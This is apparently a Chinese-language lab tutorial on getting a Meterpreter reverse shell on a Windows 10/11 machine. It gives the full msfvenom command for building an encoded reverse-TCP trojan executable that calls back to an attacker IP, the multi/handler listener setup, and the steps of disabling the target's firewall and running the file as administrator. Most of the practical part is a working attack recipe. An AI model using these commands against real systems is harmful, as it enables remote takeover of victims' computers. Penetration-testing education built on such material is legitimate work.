概念概述
反向指攻击者的机器打开一个端口,目标机器运行反向payload来连接攻击机器的端口,从而建立连接
msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,配合meterpreter在本地监听上线。
环境准备
攻击机:kali IP:192.168.200.147
靶机:window11/10
在进行实验前,需要关闭靶机的防火墙;关闭防火墙的目的是让靶机放行进站入站的流量
实战
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.200.147 LPORT=4021 -e x86/shikata_ga_nai -f exe -o /home/kali/muma.exe
注释:
生成木马于/home/kali 目录下
windows/meterpreter/reverse_tcp :生成window 平台木马,需要尝试别的平台的小伙伴可以自行百度
192.168.200.147 : 为攻击机的IP,用来监听。
4021:自设置端口,要注意的是不要被其他的服务占用。
msfconsole 进入msf控制台
use exploit/multi/handler 使用模板
show payloads 查看配置
set lhost 192.168.200.147 本机监听IP (这里改为你自己的ip)
set lport 4021 监听端口
run 运行
(此时监听端口已开启,放在一边,我们去搞事情)
随后把木马文件从目录中找出来,放进靶机。
右击以管理员运行exe文件,不出意外就成功啦
进入shell窗口后我们可以对靶机做一系列的实验,感兴趣的话可以自行百度